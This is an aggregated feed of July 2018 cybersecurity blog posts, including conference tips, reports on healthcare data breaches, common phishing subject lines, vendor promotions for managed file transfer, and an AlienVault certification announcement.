The Center for Cyber Safety and Education is hosting their annual orientation session to fill you in on the latest with the Garfield program, as well as other opportunities to engage with your community. The session kicks off Tuesday aka “Center Day” at Security Congress, which will be capped off with the Center Celebration on a riverboat cruise down the Mississippi River. The cruise is a separately ticketed event, but space is extremely limited on the Creole Queen. Make sure you save your spot soon for dinner, jazz and southern hospitality!

  1. Write your questions for Town Hall

Monday afternoon will include an (ISC)² Town Hall meeting open to both members and non-members. Management and Board of Directors members will be on the panel to talk about future developments, as well as answer your questions about membership, certification and more. You can submit your questions to congress@isc2.org or ask in person.

  1. Expand your network

Meet fellow Security Congress attendees online on the (ISC)² Community Security Congress board. You can chat with speakers, find out about upcoming webinars and earn a badge for registering for the conference. When you get to Security Congress, you’ll already know your fellow attendees and can celebrate a successful few days of learning and development at the closing event: “A Night in NOLA” Networking Night at Mardi Gras World.

  1. Leave room for swag in your bag

It’s not a conference without seemingly limitless swag! You can plan out your swag collection route with this Exhibit Hall map. Sponsors from the top cybersecurity training, product and software companies will be on hand to load you up with knowledge on their latest developments – plus probably a fidget spinner or two.

Photo:Security Magazine

The post 5 WAYS TO GET THE MOST OUT OF SECURITY CONGRESS appeared first on Cybersecurity Insiders.


July 27, 2018 at 08:33PM

Gaining security visibility of your public cloud assets

This post was originally published here by eddy smith.

As the use of public cloud services increases, security teams struggle to maintain visibility of their cloud assets. In fact, in one recent survey, 43% of cloud security pros said that lack of visibility into infrastructure security is their biggest operational headache (cite: https://ift.tt/2NXdbQB).

So why is visibility so important? The relevant phrase here is cliché, but worth repeating: you can’t protect what you can’t see (or to quote the original Drucker-ism, “you can’t manage what you can’t measure”). If you don’t have visibility of your public cloud assets, you can’t protect them.

For example, if someone opens up permissions an S3 bucket exposing your sensitive data to the entire world—how would you know about that vulnerability if you didn’t know the S3 bucket existed in the first place?

Answering basic security visibility questions like “What cloud services and resources are we using” and “Are those services and resources secure?” can be extremely challenging in modern decentralized IaaS environments where multiple cloud service provider accounts are in use. Knowing the inventory and security state of your public cloud assets is difficult when there are hundreds of parameters to assess across multiple AWS accounts.

Answering tough questions like these requires comprehensive visibility of your public cloud—but how do you gain that visibility?

Photo:Systemat

The post Gaining security visibility of your public cloud assets appeared first on Cybersecurity Insiders.


July 27, 2018 at 08:23PM

364 inmates hacked prison tablets to steal almost $225,000

By Waqas

Hundreds of inmates hacked the system and transferred almost $225,000 in their accounts. Inmates at Idaho Department of Correction are provided with computer tablets manufactured by a Florida based company JPay. These tablets are powered by communications and data services from CenturyLink, a telecommunications company, headquartered in Louisiana. The purpose of these tablets is to let inmates play games, buy music and […]

This is a post from HackRead.com Read the original post: 364 inmates hacked prison tablets to steal almost $225,000


July 27, 2018 at 06:36PM

How to Find Trustworthy Tools and Software for Your Business

By Carolina

Running a business requires a great deal of time, knowledge and expertise. If you want to take it to new heights, it’s imperative that you look for ways to save time by streamlining your processes. If not, you may find that a significant amount of time is being used carrying out mundane tasks and focusing […]

This is a post from HackRead.com Read the original post: How to Find Trustworthy Tools and Software for Your Business


July 27, 2018 at 03:21PM

Thursday, July 26, 2018

Cyber Attack on Boys Town Hospital and Blue Springs Family Care

A cyber attack on the database of Boys Town National Research Hospital in Omaha, Nebraska is said to have potentially compromised more than 105,309 patient medical records in May this year. After investigating the crisis, a spokesperson from Boys Town Healthcare chose to update the cyber incident to the press on Thursday this week.

As per the sources reporting to our Cybersecurity Insiders, it’s said that the hackers gained access to the database after sending a phishing email to one of the employees in the organization which eventually led to the hack.

All the 105,309 individuals have been informed about the hack on a digital note and notified to them in the email that info such as date of births, social security numbers, diagnosis analysis, treatment details, Medicare and Medicaid identifies, medical record numbers, billing and claims info, health insurance data, disability codes, birth and marriage certificates submitted after 2015, passport numbers, bank account numbers, website access credentials, driving license numbers, and employment identity codes were identified to have been exposed in the forensic investigation.

Why the healthcare organization chose to disclose the incident to the media this month happens to be a mystery.

In another incident of the same genre, Missouri based Blue Springs Family Care is said to have become a victim of a cyber attack where hackers have been reported to have accessed more than 44,997 patient medical records.

The hack started as a ransomware attack on an initial note and when the hospital authorities failed to pay the ransom, the hackers decided to dump the accessed data onto the dark web.
In this case, also, the attack took place on May 12, 2018, and the incident came into the light now after an investigation was carried out by a third party vendor.

Some sources reporting to Cybersecurity Insiders say that the perpetration of the database took place in Feb this year where hackers succeeded in installing a variety of malware onto the server. And the incident was only identified when the installed malware started to accept access commands from remote servers from early May this year.

The impacted data includes social security numbers, account numbers, driving license details, disability codes, medical diagnosis, addresses and dates of births.

Note- If all the data could be combined, then hackers could easily carve out a profile of a victim which can lead to a medical fraud.

The post Cyber Attack on Boys Town Hospital and Blue Springs Family Care appeared first on Cybersecurity Insiders.


July 27, 2018 at 11:16AM

Here are the most common email phishing subject lines

In technical terms, email phishing is nothing but an attempt to obtain sensitive info such as usernames and passwords and credit card details by disguising an email link to be sent from a trustworthy entity in an electronic form. This includes links connecting to websites that distribute malware, that are nefarious, X-rated and which conduct espionage on victimized device data.

A report compiled by KnowBe4 talks exactly about it and reveals the latest set of email subject lines that make you fall prey to phishing attacks. The list goes on as follows- Add me join the network, Reset password, IT notice, Tax filing, new message are among others.

The report also covers the below sentence as the most popular email subject lines that are actually phishing emails- “A delivery attempt was made”.

The next email subject line which is topping the chart of phishing attacks in this year is -“You have won a lottery” and asks to disclose your financial details in order to claim the amount.  It said that more than 23% of cyber attack victims from the US have fallen prey to this subject line as they entered some of their critical financial info which wasn’t meant to be made public at all.

Now, the biggest cyber threat of 2018 happens to be the following email subject line where hackers send an email to victims saying that “they have been caught watching Po#% content by a malware installed on their computer and if they do not want their video watching the X rated content to be circulated on web, then they need to pay the hackers $3000 in Bitcoins.

For some, the subject line and the email content may vary and might claim to have compromised your computer webcam which recorded an embarrassing video of you.

The law enforcement in the United States has stated that all such emails are scams and has urged people not to click on the links provided in such emails.

Security experts are saying to mark those messages as spam and then delete them. Also, such messages which sound to be suspicious can be reported on www dot usa.gov/stop-scams-frauds web page. This includes emails related to financial frauds, food stamp frauds, census frauds, identity theft scams, data breaches, Immigration frauds, internet frauds, and investment frauds and such…

The post Here are the most common email phishing subject lines appeared first on Cybersecurity Insiders.


July 27, 2018 at 11:13AM

5 Ways to Get the Most Out of Security Congress

Security Congress in New OrleansSecurity Congress is less than three months away! This year’s biggest and best cybersecurity conference will be held in New Orleans, Louisiana from October 8-10. Attending this year’s event can earn you as many as 46 CPEs for the year. To make sure you get the most out of #ISC2Congress, here are five things to do before you get to NOLA:

  1. Register for workshops

Reserved seating workshops are new to Security Congress this year. We will have five workshops available throughout the conference that require a registration. If you’ve already signed up for Security Congress, great! You can login to your registration and add them to your schedule. If not, hurry! Only 60 seats will be available in each workshop and most are close to full already. Security Congress workshop session numbers are 3010, 3011, 3012, 3013, 3014 and 3015 and can be found in the online agenda.

  1. Make cybersecurity personal

The Center for Cyber Safety and Education is hosting their annual orientation session to fill you in on the latest with the Garfield program, as well as other opportunities to engage with your community. The session kicks off Tuesday aka “Center Day” at Security Congress, which will be capped off with the Center Celebration on a riverboat cruise down the Mississippi River. The cruise is a separately ticketed event, but space is extremely limited on the Creole Queen. Make sure you save your spot soon for dinner, jazz and southern hospitality!

  1. Write your questions for Town Hall

Monday afternoon will include an (ISC)² Town Hall meeting open to both members and non-members. Management and Board of Directors members will be on the panel to talk about future developments, as well as answer your questions about membership, certification and more. You can submit your questions to congress@isc2.org or ask in person.

  1. Expand your network

Meet fellow Security Congress attendees online on the (ISC)² Community Security Congress board. You can chat with speakers, find out about upcoming webinars and earn a badge for registering for the conference. When you get to Security Congress, you’ll already know your fellow attendees and can celebrate a successful few days of learning and development at the closing event: “A Night in NOLA” Networking Night at Mardi Gras World.

  1. Leave room for swag in your bag

It’s not a conference without seemingly limitless swag! You can plan out your swag collection route with this Exhibit Hall map. Sponsors from the top cybersecurity training, product and software companies will be on hand to load you up with knowledge on their latest developments – plus probably a fidget spinner or two.

Security Congress Early Bird Pricing

The post 5 Ways to Get the Most Out of Security Congress appeared first on Cybersecurity Insiders.


July 27, 2018 at 09:08AM

Identity theft protection firm LifeLock may have exposed user email addresses

By Waqas

LifeLock, an Arizona-based identity theft protection firm may have exposed email addresses of millions of its customers – Simply put: A firm vowing to protect online identity of its customers may have exposed their identity to malicious hackers and cybercriminals. It happened due to a critical vulnerability which exposed LifeLock’s customers to phishing and identity […]

This is a post from HackRead.com Read the original post: Identity theft protection firm LifeLock may have exposed user email addresses


July 27, 2018 at 03:57AM

FTP and Manual Processes Aren’t Enough to Keep Your File Transfers Safe

In its youth, FTP was revolutionary. Organizations used it during the early days of the internet to transfer files, like documents and images, over internal and external channels. And though it’s been over 40 years since its creation, many people still use FTP to send and receive file transfers.

But should they? The answer is no.

It’s time to move away from FTP

In the 1970s, the internet didn’t experience the sort of malicious activity and cyber attacks that organizations face today. FTP was created before security became a much-needed consideration for file transfers, and it hasn’t changed enough since its infancy to protect file transfers from being intercepted in transit.

Despite the risks FTP and other homegrown processes bring to the table, including security vulnerabilities (e.g. passwords that are stored unencrypted and easily captured by hackers) and non-compliance with several industry regulations, many organizations still use FTP as their preferred file transfer method. Some worry changing over to a secure file transfer method would be too disruptive to their business processes. Others consider the cost of the switch as non-compatible with their budget.

Still, moving away from FTP and unsecure manual file transfers is the best thing you can do for your business data. There are secure file transfer protocols you can use, like SFTP and FTPS, that will protect your files from prying outsiders, your business from noncompliance, and your customers from compromise. And you can find these protocols (and more) wrapped up in a comprehensive, affordable package: in Managed File Transfer (MFT) software.

From FTP to MFT: What’s the benefit?

MFT software gives organizations the ability to monitor, track, and report on all file transfer activity. Security and reporting tools help meet strict requirements for compliance regulations like PCI DSS, HIPAA, the GDPR, and state privacy laws, and user management features keep users from accessing data they aren’t authorized to see.

Furthermore, MFT offers IT teams the flexibility to connect with trading partners using today’s most popular secure file transfer protocols and encryption methods, including SFTP and FTPS as well as SCP, HTTPS, AS2, and OpenPGP.

Companies also use MFT software to reduce or even eliminate the time they spend on manual file transfers, user errors, and administrative costs. Managed File Transfer works to ensure that all files are delivered successfully and protected in transit as well as at rest.

If your files are highly sensitive, it’s time to make the switch from FTP and manual processes to a file transfer method that works.

What’s next? Finding the right MFT solution

To make your search for the right MFT solution easier, download this ultimate guide to evaluating MFT software. It will walk you through the five steps to finding the right solution for your organization, explain the many benefits of MFT, and give you information detailing any industry and security considerations you might have.

The guide also includes a requirements checklist, so you can evaluate different MFT solutions with confidence—and be sure you’ve found the one you need.

FTP and manual processes aren’t enough to keep your file transfers safe.

It’s time to modernize your file transfers and workflows with a solution that follows today’s cutting-edge cybersecurity practices and guidelines. Make the switch and see the benefits of efficiency and security in your organization right away.

The post FTP and Manual Processes Aren’t Enough to Keep Your File Transfers Safe appeared first on Cybersecurity Insiders.


July 27, 2018 at 02:21AM

New! AlienVault USM Anywhere Challenge Coin: What is it and how do I get one?

AlienVault has minted a challenge coin to acknowledge the commitment and dedication it takes to become an AlienVault® Certified Security Engineer. Becoming certified in any technology is something to be proud of but becoming certified on AlienVault® USM Anywhere proves that you are skilled in deploying and managing a threat detection solution that’s trusted by thousands of customers worldwide. The coin design proudly displays the AlienVault logo, along with a specific serialization that makes it a unique, one of a kind object.

So how do you earn an AlienVault challenge coin?

The coin is earned by passing the current version of the AlienVault® Certified Security Engineer (AVSE) exam.

It’s been three months since we introduced the certification for AlienVault® USM Anywhere™ so we thought it might be helpful to share how to prepare for the AlienVault® Certified Security Engineer (AVSE) and provide some background on what candidates can expect.

Since introducing the certification, we have seen a dramatically higher pass rate for those candidates who’ve attended both the AlienVault® USM Anywhere™: Deploy, Configure, Manage (ANYDC) and the AlienVault® USM Anywhere™: Security Analysis (ANYSA) courses. The certification validates the lessons learned in both courses so while it is not required, attending both courses will provide you the skills and knowledge you’ll need to successfully complete the AVSE certification. Attending the training also gives you hands-on experience with the product and the best possible path to earning the AVSE certification.  A certification exam voucher is included with each course.  

For candidates who have not taken the training but still need to prepare for the certification, we recommend reviewing the AVSE exam blueprint which can be found at the following link: https://www.alienvault.com/certification/avse.

AlienVault USM Anywhere documentation is also a great resource for review. It provides valuable insight into the product especially for candidates who have not taken the training courses. AlienVault USM Anywhere is a powerful product that continues to deliver new features and functionality. The documentation is the best way to stay current on the latest version of the product. You can find the documentation at the following link: https://www.alienvault.com/documentation/usm-anywhere.htm

We want to wish everyone the best of luck in their pursuit of AlienVault certification. If you are currently AVSE certified, please reach us at certification@alienvault.com and we’ll get your challenge coin out to you asap. If you have any questions about purchasing training you can reach us at https://www.alienvault.com/contact or call 888-613-6023.

Earn AlienVault’s challenge coin today and showcase your AlienVault USM Anywhere expertise!

      

The post New! AlienVault USM Anywhere Challenge Coin: What is it and how do I get one? appeared first on Cybersecurity Insiders.


July 26, 2018 at 09:09PM